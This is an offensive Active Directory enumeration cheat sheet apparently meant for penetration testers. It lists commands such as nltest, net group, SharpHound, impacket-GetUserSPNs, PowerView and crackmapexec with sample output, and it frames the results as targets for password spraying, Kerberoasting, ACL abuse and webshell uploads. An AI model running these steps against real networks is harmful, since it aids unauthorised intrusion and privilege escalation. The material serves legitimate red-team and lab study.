AD ENUMERATION (FROM FOOTHOLD)
Identify domain
Confirm you're in a domain — Starting point for AD attacks
systeminfo | findstr /B Domain
echo %userdomain%
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Example Output
systeminfo | findstr Domain
Domain: corp.local
Logon Server: \\DC01
echo %userdomain%
CORP
Domain controller IP
Identify the DC — Primary target
nltest /dclist:<domain>
nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>
Example Output
nltest /dclist:corp.local
DC01.corp.local [PDC] [DS] Site: Default
Address: \\10.10.10.5
(DC IP identified for targeting)
Domain users
All domain users — Build target list
net user /domain
Get-ADUser -Filter * | Select SamAccountName
Example Output
net user /domain
Administrator Guest krbtgt
john.smith svc_sql admin.backup
svc_web jane.doe helpdesk
Domain groups
Groups and membership — Who is Domain Admin?
net group /domain
net group 'Domain Admins' /domain
Example Output
net group 'Domain Admins' /domain
Members:
Administrator john.smith svc_admin
(3 Domain Admins - these are our targets)
Domain password policy
Lockout threshold, complexity — Guides password spray rate
net accounts /domain
Example Output
net accounts /domain
Lockout threshold: 5
Lockout duration: 30 min
Minimum password length: 7
(5 attempts before lockout, spray carefully)
BloodHound collection
Graph AD relationships — Visual attack path finder
.\SharpHound.exe -c All
or: bloodhound-python -d <domain> -u <user> -p <pass> -ns <DC_IP> -c All
Example Output
.\SharpHound.exe -c All
Initializing SharpHound
Resolved: corp.local
Collected 847 objects
Zip: 20260224_BloodHound.zip
(Upload zip to BloodHound GUI)
BloodHound analysis
Query pre-built attack paths — Shows exactly how to escalate
Upload .zip to BloodHound GUI
Run: Shortest Path to Domain Admins
Run: Find AS-REP Roastable Users
Run: Find Kerberoastable Users
Example Output
Upload zip -> Queries:
'Shortest Path to Domain Admins':
john -> GenericAll -> svc_admin -> Domain Admins
'Kerberoastable Users':
svc_sql (SPN: MSSQLSvc/DB01)
(Visual attack path to DA)
Enum SPNs
Service accounts with SPNs — Kerberoast targets
Get-ADUser -Filter {ServicePrincipalName -ne '$null'} -Properties ServicePrincipalName
or: impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <DC_IP>
Example Output
impacket-GetUserSPNs corp.local/john:Password1 -dc-ip 10.10.10.5
SPN Name
MSSQLSvc/DB01:1433 svc_sql
HTTP/WEB01 svc_web
(These accounts are Kerberoastable)
Enum ACLs
Who has rights over what — GenericAll, WriteDACL, etc = takeover
Find-InterestingDomainAcl (PowerView)
or: BloodHound edge analysis
Example Output
PowerView:
Find-InterestingDomainAcl
john.smith has GenericAll over svc_admin
IT-Support group has WriteDACL over Domain Admins
(ACL abuse = privilege escalation path)
Enum computers
All domain computers — Find targets, old OS versions
Get-ADComputer -Filter * | Select Name,OperatingSystem
Example Output
Get-ADComputer -Filter * | Select Name,OperatingSystem
DC01 Windows Server 2019
WEB01 Windows Server 2019
DB01 Windows Server 2016
WIN10-1 Windows 10 Pro
(DB01 on 2016 = more exploit options)
Shares across domain
Enum all SMB shares — Find sensitive files
crackmapexec smb <subnet>/24 --shares -u <user> -p <pass>
Example Output
crackmapexec smb 10.10.10.0/24 --shares -u john -p Password1
10.10.10.5 DC01 Backups(READ) SYSVOL(READ)
10.10.10.20 WEB01 wwwroot(READ,WRITE)
10.10.10.21 DB01 SQLBackups(READ)
(WRITE on wwwroot = upload webshell)